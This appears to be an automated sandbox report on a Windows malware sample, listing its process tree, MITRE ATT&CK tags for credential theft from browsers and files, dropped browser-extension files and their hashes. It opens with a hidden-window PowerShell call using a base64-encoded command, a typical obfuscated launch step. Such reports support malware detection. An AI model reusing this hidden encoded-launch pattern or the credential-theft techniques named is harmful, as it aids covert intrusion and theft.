C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3312 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2732
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1028
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1700
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5116 -ip 51161⤵PID:4904
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55d3cbc47ab224ef9422b5b0ee3073852
SHA12d6422de395dc2009525e35bbdba31d815c10188
SHA2567d66cb7a422742729d2ced0b5207261f643bcb364a63a9fffe22913cf7cdc91d
SHA512009c65f93894aeef7b3a7e08073712115649378f8b2e5c9befc3136aa0d14e9470530578f2f9a8eebeafa981526c191ddae9e7972b71c9afb4f240c299682380
-
Filesize
2KB
MD5a4ecc709fa4dba82361bf02e4d6efffe
SHA11e31b963b8272adc67db7ac9a7e189c6086b56b5
SHA25688c675f40d650105711e4084e66c8764fbb7526e8dd23ddfdb5d4ab58bcd4562
SHA512477334f90f9bdd612653aef8f0cefb52eb23bbf4ba0152b9c13ca153415901c67c620aeef59f1f2e9d955ab6a2e4a879d72872485e6ee584e184a27b2340892a
-
Filesize
2KB
MD5be2e531d4f0438745aea9b59a84acc7f
SHA162e4397a18fbf3746d9f3b310610e0a35fb4d526
SHA2564d1e19ce6f66b5ea0edc15c7540e33ce00efa5a0d569808abbb9ff34cd5882a9
SHA5128bdad069adbf3153b131063518252d291f9e87d9d1b02a4b2afd116377a4547870c2252c02668692716c1ba6abb031b91162a4960f6a8a4c4692361211b294e2
-
Filesize
2KB
MD5bdb602c1dfcc21e8fa6a6730520b61b1
SHA1c94e15d492b7018b74e80349103258a9eb0076a5
SHA2560de45d0c8318205ce7d082799fdcafd70a54d36da350dec7be9c1ddf47a498a5
SHA5121d91e2d7698dcf9bf3151f25c9a6b9a2fe858d6e8f66a919b1df04a53c1e0e0fb5263f02cf257c9a8cbb1f78ee3f354a451e7b04860a1c296de7fd502bbdfc47
-
Filesize
644KB
MD564ba3bd8709d2b89ca221f6cb30ec5bc
SHA10d217dcd86820d601b7983001a7e4a84ebdc304f
SHA256e7f01034eecf646564917023707b607179d48404735561aaacdd6f3781f4b416
SHA512247c8dd44057b513f34bcfb39f4650cf643065413767dcb2ec27f12e01dbae29bb24a1bf5ac16b603ea486fb2ccf7e4cb190f16d110aa95cab14847cfd49f226
-
Filesize
2KB
MD5b23c00f2c45783ee3df03c19b74bc301
SHA15912a7d0f93d1570ab3f63462eb2c396c1601536
SHA256fd49db1545336b779f3bf0731bc65622d5f9201c29fb81415373fa592393906a
SHA512ab6d3db7f8ba5adb68b4bde2b8dde1f8399b0229dc69d027a636630ab20515f56a1f0c7449788aa3894266492fb2c02521dcae63545515c8888ab4ce050ceee4
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fakaldmaepeakkcjljcakjphgknbbbmp\1.1_0\_locales\en\messages.json
Filesize150B
MD533292c7c04ba45e9630bb3d6c5cabf74
SHA13482eb8038f429ad76340d3b0d6eea6db74e31bd
SHA2569bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249
SHA5122439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fakaldmaepeakkcjljcakjphgknbbbmp\1.1_0\_locales\pt_BR\messages.json
Filesize161B
MD55c5a1426ff0c1128c1c6b8bc20ca29ac
SHA10e3540b647b488225c9967ff97afc66319102ccd
SHA2565e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839
SHA5121f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4
-
Filesize
1KB
MD5def65711d78669d7f8e69313be4acf2e
SHA16522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA51205b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ehjcjbdklhanfkcemjelopjanaednaan\1.0_0\_locales\es\messages.json
Filesize186B
MD5a14d4b287e82b0c724252d7060b6d9e9
SHA1da9d3da2df385d48f607445803f5817f635cc52d
SHA2561e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152
SHA5121c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb
-
Filesize
15KB
MD5e80cfe966b3a212d12e8b82b7e34f215
SHA1c685ffdf154190eaed1a337b43a83c1a0549faa2
SHA256a21680e766c2056b6389813410cb80a322986f36108c15bf7900a8f1f5238193
SHA512066afde4701b66df01dfd45fdac2d6471b8dc1912eecda80379b555c5b7e489852de6d82e58175aa59f58a4a26f47d1854d7f38d96077b5a06a946f626135fdc
-
Filesize
11KB
MD598ff6d02798b4e25eadd4017d8405125
SHA174be7633ccd986db31c23078014eda24cda06d5e
SHA25636204514d6d1f07046007e2f7f6bbdca7d5826949e5a9c18601e6c773baf40bf
SHA51251aa74a24a9b9f2961be6bb94e539d54667ae7033feb89586c5f15a7e9ffb6db747a01bfffd980e63974d55897c0a27562f3672d0ae651faec2c3b6dee407a94
-
Filesize
11KB
MD500e86c77e0fead528cb6a70b48624f95
SHA1bc5b6232792bec2ada0153988c4f592365f4cdf8
SHA256479e81974cc7b2fab1be4d90f5763687e3536e69abd08cccc62e9e15857ef806
SHA512516f11816aa330a056bd68e73bc552ce389b46c260371eeca6bddaa27205b85a9ec5c63ce01ba9570b3bb3b16855d98481eba2b62a40a516d8e761af50f95c18
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
11KB
MD59515d63ab6aba1849f36c24c5c5e101d
SHA1158d1bb116e8c9428526898278daf5d9ee9e324f
SHA25693c7a43262ab4086f892cebc0dd76f10ee1d29b3d14f1d0e983511150b8254fd
SHA5120d0c579c3be5c1dd997b1f913be11fe48cc2bb061358f35588aec6d89ae27dfaa734471f877a3eb00536d3c327dee69998f1226bc7cd441e81a44714c63cd976
-
Filesize
7KB
MD5ce5ddf4e81ccee60ca845de116ed10f0
SHA146dc7c3be4f5bcb4893a59f1d54ccbd60556a74f
SHA256fb002c12910d80c8c775d00ff51235f079378b52f37950480b205f4a8fa52fa5
SHA512fe606cf824d4894415171437a709af36fe1bd67eadbfd949729c0298473d1635ba4c3deea7af028f23dcdc2c8ec6788906a0fb1368a26957cb421662ba15bb96